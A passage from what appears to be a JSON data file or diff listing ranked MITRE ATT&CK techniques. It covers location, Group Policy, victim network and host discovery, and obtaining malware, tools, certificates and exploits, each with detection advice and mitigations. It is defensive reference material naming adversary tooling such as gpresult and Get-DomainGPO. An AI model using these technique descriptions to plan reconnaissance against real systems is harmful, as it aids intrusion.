for application pods to detect malicious activity at the cluster level. In Docker, the daemon log provides insight into remote API calls, including those that deploy containers. Logs for management services or applications used to deploy containers other than the native technologies themselves should also be monitored.", + "score": 0.1, + "mitigations": [ + { + "mid": "M1018", + "name": "User Account Management", + "description": "Manage the creation, modification, use, and permissions associated to user accounts.", + "url": "https://attack.mitre.org/mitigations/M1018" + }, + { + "mid": "M1030", + "name": "Network Segmentation", + "description": "Architect sections of the network to isolate critical systems, functions, or resources. Use physical and logical segmentation to prevent access to potentially sensitive systems and information. Use a DMZ to contain any internet-facing services that should not be exposed from the internal network. Configure separate virtual private cloud (VPC) instances to isolate critical cloud systems.", + "url": "https://attack.mitre.org/mitigations/M1030" + }, + { + "mid": "M1035", + "name": "Limit Access to Resource Over Network", + "description": "Prevent access to file shares, remote access to systems, unnecessary services. Mechanisms to limit access may include use of network concentrators, RDP gateways, etc.", + "url": "https://attack.mitre.org/mitigations/M1035" + } + ], + "subtechniques": [] + }, + { + "rank": 173, + "tid": "T1614", + "name": "System Location Discovery", + "description": "Adversaries may gather information in an attempt to calculate the geographical location of a victim host. Adversaries may use the information from System Location Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.\nAdversaries may attempt to infer the location of a system using various system checks, such as time zone, keyboard layout, and/or language settings.(Citation: FBI Ragnar Locker 2020)(Citation: Sophos Geolocation 2016)(Citation: Bleepingcomputer RAT malware 2020) Windows API functions such as GetLocaleInfoW can also be used to determine the locale of the host.(Citation: FBI Ragnar Locker 2020) In cloud environments, an instance's availability zone may also be discovered by accessing the instance metadata service from the instance.(Citation: AWS Instance Identity Documents)(Citation: Microsoft Azure Instance Metadata 2021)\nAdversaries may also attempt to infer the location of a victim host using IP addressing, such as via online geolocation IP-lookup services.(Citation: Securelist Trasparent Tribe 2020)(Citation: Sophos Geolocation 2016)", + "url": "https://attack.mitre.org/techniques/T1614", + "detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities based on the information obtained.\nMonitor processes and command-line arguments for actions that could be taken to gather system location information. Remote access tools with built-in features may interact directly with the Windows API, such as calling GetLocaleInfoW to gather information.(Citation: FBI Ragnar Locker 2020)\nMonitor traffic flows to geo-location service provider sites, such as ip-api and ipinfo.", + "score": 0.1, + "mitigations": [], + "subtechniques": [ + { + "tid": "T1614.001", + "name": "System Location Discovery: System Language Discovery", + "description": "Adversaries may attempt to gather information about the system language of a victim in order to infer the geographical location of that host. This information may be used to shape follow-on behaviors, including whether the adversary infects the target and/or attempts specific actions. This decision may be employed by malware developers and operators to reduce their risk of attracting the attention of specific law enforcement agencies or prosecution/scrutiny from other entities.(Citation: Malware System Language Check)\nThere are various sources of data an adversary could use to infer system language, such as system defaults and keyboard layouts. Specific checks will vary based on the target and/or adversary, but may involve behaviors such as Query Registry and calls to Native API functions.(Citation: CrowdStrike Ryuk January 2019) \nFor example, on a Windows system adversaries may attempt to infer the language of a system by querying the registry key HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Nls\\Language or parsing the outputs of Windows API functions GetUserDefaultUILanguage, GetSystemDefaultUILanguage, GetKeyboardLayoutList and GetUserDefaultLangID.(Citation: Darkside Ransomware Cybereason)(Citation: Securelist JSWorm)(Citation: SecureList SynAck Doppelgänging May 2018)\nOn a macOS or Linux system, adversaries may query locale to retrieve the value of the $LANG environment variable.", + "url": "https://attack.mitre.org/techniques/T1614/001", + "detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities based on the information obtained.\nMonitor processes and command-line arguments for actions that could be taken to gather system language information. This may include calls to various API functions and interaction with system configuration settings such as the Windows Registry.", + "mitigations": [] + } + ] + }, + { + "rank": 174, + "tid": "T1615", + "name": "Group Policy Discovery", + "description": "Adversaries may gather information on Group Policy settings to identify paths for privilege escalation, security measures applied within a domain, and to discover patterns in domain objects that can be manipulated or used to blend in the environment. Group Policy allows for centralized management of user and computer settings in Active Directory (AD). Group policy objects (GPOs) are containers for group policy settings made up of files stored within a predicable network path \\\\SYSVOL\\\\Policies\\.(Citation: TechNet Group Policy Basics)(Citation: ADSecurity GPO Persistence 2016)\nAdversaries may use commands such as gpresult or various publicly available PowerShell functions, such as Get-DomainGPO and Get-DomainGPOLocalGroup, to gather information on Group Policy settings.(Citation: Microsoft gpresult)(Citation: Github PowerShell Empire) Adversaries may use this information to shape follow-on behaviors, including determining potential attack paths within the target network as well as opportunities to manipulate Group Policy settings (i.e. Domain Policy Modification) for their benefit.", + "url": "https://attack.mitre.org/techniques/T1615", + "detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities based on the information obtained.\nMonitor for suspicious use of gpresult. Monitor for the use of PowerShell functions such as Get-DomainGPO and Get-DomainGPOLocalGroup and processes spawning with command-line arguments containing GPOLocalGroup.\nMonitor for abnormal LDAP queries with filters for groupPolicyContainer and high volumes of LDAP traffic to domain controllers. Windows Event ID 4661 can also be used to detect when a directory service has been accessed.", + "score": 0.1, + "mitigations": [], + "subtechniques": [] + }, + { + "rank": 175, + "tid": "T1590", + "name": "Gather Victim Network Information", + "description": "Adversaries may gather information about the victim's networks that can be used during targeting. Information about networks may include a variety of details, including administrative data (ex: IP ranges, domain names, etc.) as well as specifics regarding its topology and operations.\nAdversaries may gather this information in various ways, such as direct collection actions via Active Scanning or Phishing for Information. Information about networks may also be exposed to adversaries via online or other accessible data sets (ex: Search Open Technical Databases).(Citation: WHOIS)(Citation: DNS Dumpster)(Citation: Circl Passive DNS) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: Active Scanning or Search Open Websites/Domains), establishing operational resources (ex: Acquire Infrastructure or Compromise Infrastructure), and/or initial access (ex: Trusted Relationship).", + "url": "https://attack.mitre.org/techniques/T1590", + "detection": "Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.", + "score": 0.08333333333333334, + "mitigations": [ + { + "mid": "M1056", + "name": "Pre-compromise", + "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.", + "url": "https://attack.mitre.org/mitigations/M1056" + } + ], + "subtechniques": [ + { + "tid": "T1590.001", + "name": "Gather Victim Network Information: Domain Properties", + "description": "Adversaries may gather information about the victim's network domain(s) that can be used during targeting. Information about domains and their properties may include a variety of details, including what domain(s) the victim owns as well as administrative data (ex: name, registrar, etc.) and more directly actionable information such as contacts (email addresses and phone numbers), business addresses, and name servers.\nAdversaries may gather this information in various ways, such as direct collection actions via Active Scanning or Phishing for Information. Information about victim domains and their properties may also be exposed to adversaries via online or other accessible data sets (ex: WHOIS).(Citation: WHOIS)(Citation: DNS Dumpster)(Citation: Circl Passive DNS) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: Search Open Technical Databases, Search Open Websites/Domains, or Phishing for Information), establishing operational resources (ex: Acquire Infrastructure or Compromise Infrastructure), and/or initial access (ex: Phishing).", + "url": "https://attack.mitre.org/techniques/T1590/001", + "detection": "Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.", + "mitigations": [ + { + "mid": "M1056", + "name": "Pre-compromise", + "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.", + "url": "https://attack.mitre.org/mitigations/M1056" + } + ] + }, + { + "tid": "T1590.002", + "name": "Gather Victim Network Information: DNS", + "description": "Adversaries may gather information about the victim's DNS that can be used during targeting. DNS information may include a variety of details, including registered name servers as well as records that outline addressing for a target’s subdomains, mail servers, and other hosts.\nAdversaries may gather this information in various ways, such as querying or otherwise collecting details via DNS/Passive DNS. DNS information may also be exposed to adversaries via online or other accessible data sets (ex: Search Open Technical Databases).(Citation: DNS Dumpster)(Citation: Circl Passive DNS) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: Search Open Technical Databases, Search Open Websites/Domains, or Active Scanning), establishing operational resources (ex: Acquire Infrastructure or Compromise Infrastructure), and/or initial access (ex: External Remote Services).", + "url": "https://attack.mitre.org/techniques/T1590/002", + "detection": "Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.", + "mitigations": [ + { + "mid": "M1056", + "name": "Pre-compromise", + "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.", + "url": "https://attack.mitre.org/mitigations/M1056" + } + ] + }, + { + "tid": "T1590.003", + "name": "Gather Victim Network Information: Network Trust Dependencies", + "description": "Adversaries may gather information about the victim's network trust dependencies that can be used during targeting. Information about network trusts may include a variety of details, including second or third-party organizations/domains (ex: managed service providers, contractors, etc.) that have connected (and potentially elevated) network access.\nAdversaries may gather this information in various ways, such as direct elicitation via Phishing for Information. Information about network trusts may also be exposed to adversaries via online or other accessible data sets (ex: Search Open Technical Databases).(Citation: Pentesting AD Forests) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: Active Scanning or Search Open Websites/Domains), establishing operational resources (ex: Acquire Infrastructure or Compromise Infrastructure), and/or initial access (ex: Trusted Relationship).", + "url": "https://attack.mitre.org/techniques/T1590/003", + "detection": "Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.", + "mitigations": [ + { + "mid": "M1056", + "name": "Pre-compromise", + "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.", + "url": "https://attack.mitre.org/mitigations/M1056" + } + ] + }, + { + "tid": "T1590.004", + "name": "Gather Victim Network Information: Network Topology", + "description": "Adversaries may gather information about the victim's network topology that can be used during targeting. Information about network topologies may include a variety of details, including the physical and/or logical arrangement of both external-facing and internal network environments. This information may also include specifics regarding network devices (gateways, routers, etc.) and other infrastructure.\nAdversaries may gather this information in various ways, such as direct collection actions via Active Scanning or Phishing for Information. Information about network topologies may also be exposed to adversaries via online or other accessible data sets (ex: Search Victim-Owned Websites).(Citation: DNS Dumpster) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: Search Open Technical Databases or Search Open Websites/Domains), establishing operational resources (ex: Acquire Infrastructure or Compromise Infrastructure), and/or initial access (ex: External Remote Services).", + "url": "https://attack.mitre.org/techniques/T1590/004", + "detection": "Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.", + "mitigations": [ + { + "mid": "M1056", + "name": "Pre-compromise", + "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.", + "url": "https://attack.mitre.org/mitigations/M1056" + } + ] + }, + { + "tid": "T1590.005", + "name": "Gather Victim Network Information: IP Addresses", + "description": "Adversaries may gather the victim's IP addresses that can be used during targeting. Public IP addresses may be allocated to organizations by block, or a range of sequential addresses. Information about assigned IP addresses may include a variety of details, such as which IP addresses are in use. IP addresses may also enable an adversary to derive other details about a victim, such as organizational size, physical location(s), Internet service provider, and or where/how their publicly-facing infrastructure is hosted.\nAdversaries may gather this information in various ways, such as direct collection actions via Active Scanning or Phishing for Information. Information about assigned IP addresses may also be exposed to adversaries via online or other accessible data sets (ex: Search Open Technical Databases).(Citation: WHOIS)(Citation: DNS Dumpster)(Citation: Circl Passive DNS) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: Active Scanning or Search Open Websites/Domains), establishing operational resources (ex: Acquire Infrastructure or Compromise Infrastructure), and/or initial access (ex: External Remote Services).", + "url": "https://attack.mitre.org/techniques/T1590/005", + "detection": "Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.", + "mitigations": [ + { + "mid": "M1056", + "name": "Pre-compromise", + "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.", + "url": "https://attack.mitre.org/mitigations/M1056" + } + ] + }, + { + "tid": "T1590.006", + "name": "Gather Victim Network Information: Network Security Appliances", + "description": "Adversaries may gather information about the victim's network security appliances that can be used during targeting. Information about network security appliances may include a variety of details, such as the existence and specifics of deployed firewalls, content filters, and proxies/bastion hosts. Adversaries may also target information about victim network-based intrusion detection systems (NIDS) or other appliances related to defensive cybersecurity operations.\nAdversaries may gather this information in various ways, such as direct collection actions via Active Scanning or Phishing for Information.(Citation: Nmap Firewalls NIDS) Information about network security appliances may also be exposed to adversaries via online or other accessible data sets (ex: Search Victim-Owned Websites). Gathering this information may reveal opportunities for other forms of reconnaissance (ex: Search Open Technical Databases or Search Open Websites/Domains), establishing operational resources (ex: Develop Capabilities or Obtain Capabilities), and/or initial access (ex: External Remote Services).", + "url": "https://attack.mitre.org/techniques/T1590/006", + "detection": "Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.", + "mitigations": [ + { + "mid": "M1056", + "name": "Pre-compromise", + "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.", + "url": "https://attack.mitre.org/mitigations/M1056" + } + ] + } + ] + }, + { + "rank": 176, + "tid": "T1592", + "name": "Gather Victim Host Information", + "description": "Adversaries may gather information about the victim's hosts that can be used during targeting. Information about hosts may include a variety of details, including administrative data (ex: name, assigned IP, functionality, etc.) as well as specifics regarding its configuration (ex: operating system, language, etc.).\nAdversaries may gather this information in various ways, such as direct collection actions via Active Scanning or Phishing for Information. Adversaries may also compromise sites then include malicious content designed to collect host information from visitors.(Citation: ATT ScanBox) Information about hosts may also be exposed to adversaries via online or other accessible data sets (ex: Social Media or Search Victim-Owned Websites). Gathering this information may reveal opportunities for other forms of reconnaissance (ex: Search Open Websites/Domains or Search Open Technical Databases), establishing operational resources (ex: Develop Capabilities or Obtain Capabilities), and/or initial access (ex: Supply Chain Compromise or External Remote Services).", + "url": "https://attack.mitre.org/techniques/T1592", + "detection": "Internet scanners may be used to look for patterns associated with malicious content designed to collect host information from visitors.(Citation: ThreatConnect Infrastructure Dec 2020)(Citation: ATT ScanBox)\nMuch of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.", + "score": 0.07857142857142857, + "mitigations": [ + { + "mid": "M1056", + "name": "Pre-compromise", + "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.", + "url": "https://attack.mitre.org/mitigations/M1056" + } + ], + "subtechniques": [ + { + "tid": "T1592.001", + "name": "Gather Victim Host Information: Hardware", + "description": "Adversaries may gather information about the victim's host hardware that can be used during targeting. Information about hardware infrastructure may include a variety of details such as types and versions on specific hosts, as well as the presence of additional components that might be indicative of added defensive protections (ex: card/biometric readers, dedicated encryption hardware, etc.).\nAdversaries may gather this information in various ways, such as direct collection actions via Active Scanning (ex: hostnames, server banners, user agent strings) or Phishing for Information. Adversaries may also compromise sites then include malicious content designed to collect host information from visitors.(Citation: ATT ScanBox) Information about the hardware infrastructure may also be exposed to adversaries via online or other accessible data sets (ex: job postings, network maps, assessment reports, resumes, or purchase invoices). Gathering this information may reveal opportunities for other forms of reconnaissance (ex: Search Open Websites/Domains or Search Open Technical Databases), establishing operational resources (ex: Develop Capabilities or Obtain Capabilities), and/or initial access (ex: Compromise Hardware Supply Chain or Hardware Additions).", + "url": "https://attack.mitre.org/techniques/T1592/001", + "detection": "Internet scanners may be used to look for patterns associated with malicious content designed to collect host hardware information from visitors.(Citation: ThreatConnect Infrastructure Dec 2020)(Citation: ATT ScanBox)\nMuch of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.", + "mitigations": [ + { + "mid": "M1056", + "name": "Pre-compromise", + "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.", + "url": "https://attack.mitre.org/mitigations/M1056" + } + ] + }, + { + "tid": "T1592.002", + "name": "Gather Victim Host Information: Software", + "description": "Adversaries may gather information about the victim's host software that can be used during targeting. Information about installed software may include a variety of details such as types and versions on specific hosts, as well as the presence of additional components that might be indicative of added defensive protections (ex: antivirus, SIEMs, etc.).\nAdversaries may gather this information in various ways, such as direct collection actions via Active Scanning (ex: listening ports, server banners, user agent strings) or Phishing for Information. Adversaries may also compromise sites then include malicious content designed to collect host information from visitors.(Citation: ATT ScanBox) Information about the installed software may also be exposed to adversaries via online or other accessible data sets (ex: job postings, network maps, assessment reports, resumes, or purchase invoices). Gathering this information may reveal opportunities for other forms of reconnaissance (ex: Search Open Websites/Domains or Search Open Technical Databases), establishing operational resources (ex: Develop Capabilities or Obtain Capabilities), and/or for initial access (ex: Supply Chain Compromise or External Remote Services).", + "url": "https://attack.mitre.org/techniques/T1592/002", + "detection": "Internet scanners may be used to look for patterns associated with malicious content designed to collect host software information from visitors.(Citation: ThreatConnect Infrastructure Dec 2020)(Citation: ATT ScanBox)\nMuch of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.", + "mitigations": [ + { + "mid": "M1056", + "name": "Pre-compromise", + "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.", + "url": "https://attack.mitre.org/mitigations/M1056" + } + ] + }, + { + "tid": "T1592.003", + "name": "Gather Victim Host Information: Firmware", + "description": "Adversaries may gather information about the victim's host firmware that can be used during targeting. Information about host firmware may include a variety of details such as type and versions on specific hosts, which may be used to infer more information about hosts in the environment (ex: configuration, purpose, age/patch level, etc.).\nAdversaries may gather this information in various ways, such as direct elicitation via Phishing for Information. Information about host firmware may only be exposed to adversaries via online or other accessible data sets (ex: job postings, network maps, assessment reports, resumes, or purchase invoices).(Citation: ArsTechnica Intel) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: Search Open Websites/Domains or Search Open Technical Databases), establishing operational resources (ex: Develop Capabilities or Obtain Capabilities), and/or initial access (ex: Supply Chain Compromise or Exploit Public-Facing Application).", + "url": "https://attack.mitre.org/techniques/T1592/003", + "detection": "Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.", + "mitigations": [ + { + "mid": "M1056", + "name": "Pre-compromise", + "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.", + "url": "https://attack.mitre.org/mitigations/M1056" + } + ] + }, + { + "tid": "T1592.004", + "name": "Gather Victim Host Information: Client Configurations", + "description": "Adversaries may gather information about the victim's client configurations that can be used during targeting. Information about client configurations may include a variety of details and settings, including operating system/version, virtualization, architecture (ex: 32 or 64 bit), language, and/or time zone.\nAdversaries may gather this information in various ways, such as direct collection actions via Active Scanning (ex: listening ports, server banners, user agent strings) or Phishing for Information. Adversaries may also compromise sites then include malicious content designed to collect host information from visitors.(Citation: ATT ScanBox) Information about the client configurations may also be exposed to adversaries via online or other accessible data sets (ex: job postings, network maps, assessment reports, resumes, or purchase invoices). Gathering this information may reveal opportunities for other forms of reconnaissance (ex: Search Open Websites/Domains or Search Open Technical Databases), establishing operational resources (ex: Develop Capabilities or Obtain Capabilities), and/or initial access (ex: Supply Chain Compromise or External Remote Services).", + "url": "https://attack.mitre.org/techniques/T1592/004", + "detection": "Internet scanners may be used to look for patterns associated with malicious content designed to collect client configuration information from visitors.(Citation: ThreatConnect Infrastructure Dec 2020)(Citation: ATT ScanBox)\nMuch of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.", + "mitigations": [ + { + "mid": "M1056", + "name": "Pre-compromise", + "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.", + "url": "https://attack.mitre.org/mitigations/M1056" + } + ] + } + ] + }, + { + "rank": 177, + "tid": "T1588", + "name": "Obtain Capabilities", + "description": "Adversaries may buy and/or steal capabilities that can be used during targeting. Rather than developing their own capabilities in-house, adversaries may purchase, freely download, or steal them. Activities may include the acquisition of malware, software (including licenses), exploits, certificates, and information relating to vulnerabilities. Adversaries may obtain capabilities to support their operations throughout numerous phases of the adversary lifecycle.\nIn addition to downloading free malware, software, and exploits from the internet, adversaries may purchase these capabilities from third-party entities. Third-party entities can include technology companies that specialize in malware and exploits, criminal marketplaces, or from individuals.(Citation: NationsBuying)(Citation: PegasusCitizenLab)\nIn addition to purchasing capabilities, adversaries may steal capabilities from third-party entities (including other adversaries). This can include stealing software licenses, malware, SSL/TLS and code-signing certificates, or raiding closed databases of vulnerabilities or exploits.(Citation: DiginotarCompromise)", + "url": "https://attack.mitre.org/techniques/T1588", + "detection": "Consider analyzing malware for features that may be associated with malware providers, such as compiler used, debugging artifacts, code similarities, or even group identifiers associated with specific Malware-as-a-Service (MaaS) offerings. Malware repositories can also be used to identify additional samples associated with the developers and the adversary utilizing their services. Identifying overlaps in malware use by different adversaries may indicate malware was obtained by the adversary rather than developed by them. In some cases, identifying overlapping characteristics in malware used by different adversaries may point to a shared quartermaster.(Citation: FireEyeSupplyChain) Malware repositories can also be used to identify features of tool use associated with an adversary, such as watermarks in Cobalt Strike payloads.(Citation: Analyzing CS Dec 2020)\nConsider use of services that may aid in the tracking of newly issued certificates and/or certificates in use on sites across the Internet. In some cases it may be possible to pivot on known pieces of certificate information to uncover other adversary infrastructure.(Citation: Splunk Kovar Certificates 2017) Some server-side components of adversary tools may have default values set for SSL/TLS certificates.(Citation: Recorded Future Beacon Certificates)\nMuch of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Defense Evasion or Command and Control.", + "score": 0.05952380952380953, + "mitigations": [ + { + "mid": "M1056", + "name": "Pre-compromise", + "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.", + "url": "https://attack.mitre.org/mitigations/M1056" + } + ], + "subtechniques": [ + { + "tid": "T1588.001", + "name": "Obtain Capabilities: Malware", + "description": "Adversaries may buy, steal, or download malware that can be used during targeting. Malicious software can include payloads, droppers, post-compromise tools, backdoors, packers, and C2 protocols. Adversaries may acquire malware to support their operations, obtaining a means for maintaining control of remote machines, evading defenses, and executing post-compromise behaviors.\nIn addition to downloading free malware from the internet, adversaries may purchase these capabilities from third-party entities. Third-party entities can include technology companies that specialize in malware development, criminal marketplaces (including Malware-as-a-Service, or MaaS), or from individuals. In addition to purchasing malware, adversaries may steal and repurpose malware from third-party entities (including other adversaries).", + "url": "https://attack.mitre.org/techniques/T1588/001", + "detection": "Consider analyzing malware for features that may be associated with malware providers, such as compiler used, debugging artifacts, code similarities, or even group identifiers associated with specific MaaS offerings. Malware repositories can also be used to identify additional samples associated with the developers and the adversary utilizing their services. Identifying overlaps in malware use by different adversaries may indicate malware was obtained by the adversary rather than developed by them. In some cases, identifying overlapping characteristics in malware used by different adversaries may point to a shared quartermaster.(Citation: FireEyeSupplyChain)\nMuch of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on post-compromise phases of the adversary lifecycle.", + "mitigations": [ + { + "mid": "M1056", + "name": "Pre-compromise", + "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.", + "url": "https://attack.mitre.org/mitigations/M1056" + } + ] + }, + { + "tid": "T1588.002", + "name": "Obtain Capabilities: Tool", + "description": "Adversaries may buy, steal, or download software tools that can be used during targeting. Tools can be open or closed source, free or commercial. A tool can be used for malicious purposes by an adversary, but (unlike malware) were not intended to be used for those purposes (ex: PsExec). Tool acquisition can involve the procurement of commercial software licenses, including for red teaming tools such as Cobalt Strike. Commercial software may be obtained through purchase, stealing licenses (or licensed copies of the software), or cracking trial versions.(Citation: Recorded Future Beacon 2019)\nAdversaries may obtain tools to support their operations, including to support execution of post-compromise behaviors. In addition to freely downloading or purchasing software, adversaries may steal software and/or software licenses from third-party entities (including other adversaries).", + "url": "https://attack.mitre.org/techniques/T1588/002", + "detection": "In some cases, malware repositories can also be used to identify features of tool use associated with an adversary, such as watermarks in Cobalt Strike payloads.(Citation: Analyzing CS Dec 2020)\nMuch of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on post-compromise phases of the adversary lifecycle.", + "mitigations": [ + { + "mid": "M1056", + "name": "Pre-compromise", + "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.", + "url": "https://attack.mitre.org/mitigations/M1056" + } + ] + }, + { + "tid": "T1588.003", + "name": "Obtain Capabilities: Code Signing Certificates", + "description": "Adversaries may buy and/or steal code signing certificates that can be used during targeting. Code signing is the process of digitally signing executables and scripts to confirm the software author and guarantee that the code has not been altered or corrupted. Code signing provides a level of authenticity for a program from the developer and a guarantee that the program has not been tampered with.(Citation: Wikipedia Code Signing) Users and/or security tools may trust a signed piece of code more than an unsigned piece of code even if they don't know who issued the certificate or who the author is.\nPrior to Code Signing, adversaries may purchase or steal code signing certificates for use in operations. The purchase of code signing certificates may be done using a front organization or using information stolen from a previously compromised entity that allows the adversary to validate to a certificate provider as that entity. Adversaries may also steal code signing materials directly from a compromised third-party.", + "url": "https://attack.mitre.org/techniques/T1588/003", + "detection": "Consider analyzing code signing certificates for features that may be associated with the adversary and/or their developers, such as the thumbprint, algorithm used, validity period, common name, and certificate authority. Malware repositories can also be used to identify additional samples associated with the adversary and identify patterns an adversary has used in procuring code signing certificates.\nMuch of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related follow-on behavior, such as Code Signing or Install Root Certificate.", + "mitigations": [ + { + "mid": "M1056", + "name": "Pre-compromise", + "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.", + "url": "https://attack.mitre.org/mitigations/M1056" + } + ] + }, + { + "tid": "T1588.004", + "name": "Obtain Capabilities: Digital Certificates", + "description": "Adversaries may buy and/or steal SSL/TLS certificates that can be used during targeting. SSL/TLS certificates are designed to instill trust. They include information about the key, information about its owner's identity, and the digital signature of an entity that has verified the certificate's contents are correct. If the signature is valid, and the person examining the certificate trusts the signer, then they know they can use that key to communicate with its owner.\nAdversaries may purchase or steal SSL/TLS certificates to further their operations, such as encrypting C2 traffic (ex: Asymmetric Cryptography with Web Protocols) or even enabling Adversary-in-the-Middle if the certificate is trusted or otherwise added to the root of trust (i.e. Install Root Certificate). The purchase of digital certificates may be done using a front organization or using information stolen from a previously compromised entity that allows the adversary to validate to a certificate provider as that entity. Adversaries may also steal certificate materials directly from a compromised third-party, including from certificate authorities.(Citation: DiginotarCompromise) Adversaries may register or hijack domains that they will later purchase an SSL/TLS certificate for.\nCertificate authorities exist that allow adversaries to acquire SSL/TLS certificates, such as domain validation certificates, for free.(Citation: Let's Encrypt FAQ)\nAfter obtaining a digital certificate, an adversary may then install that certificate (see Install Digital Certificate) on infrastructure under their control.", + "url": "https://attack.mitre.org/techniques/T1588/004", + "detection": "Consider use of services that may aid in the tracking of newly issued certificates and/or certificates in use on sites across the Internet. In some cases it may be possible to pivot on known pieces of certificate information to uncover other adversary infrastructure.(Citation: Splunk Kovar Certificates 2017) Some server-side components of adversary tools may have default values set for SSL/TLS certificates.(Citation: Recorded Future Beacon Certificates)\nDetection efforts may be focused on related behaviors, such as Web Protocols, Asymmetric Cryptography, and/or Install Root Certificate.", + "mitigations": [ + { + "mid": "M1056", + "name": "Pre-compromise", + "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.", + "url": "https://attack.mitre.org/mitigations/M1056" + } + ] + }, + { + "tid": "T1588.005", + "name": "Obtain Capabilities: Exploits", + "description": "Adversaries may buy, steal, or download exploits that can be used during targeting. An exploit takes advantage of a bug or vulnerability in order to cause unintended or unanticipated behavior to occur on computer hardware or software. Rather than developing their own exploits, an adversary may find/modify exploits from online or purchase them from exploit vendors.(Citation: Exploit Database)(Citation: TempertonDarkHotel)(Citation: NationsBuying)\nIn addition to downloading free exploits from the internet, adversaries may purchase exploits from third-party entities. Third-party entities can include technology companies that specialize in exploit development, criminal marketplaces (including exploit kits), or from individuals.(Citation: PegasusCitizenLab)(Citation: Wired SandCat Oct 2019) In addition to purchasing exploits, adversaries may steal and repurpose exploits from third-party entities (including other adversaries).(Citation: TempertonDarkHotel)\nAn adversary may monitor exploit provider forums to understand the state of existing, as well as newly discovered, exploits. There is usually a delay between when an exploit is discovered and when it is made public. An adversary may target the systems of those known to conduct exploit research and development in order to gain that knowledge for use during a subsequent 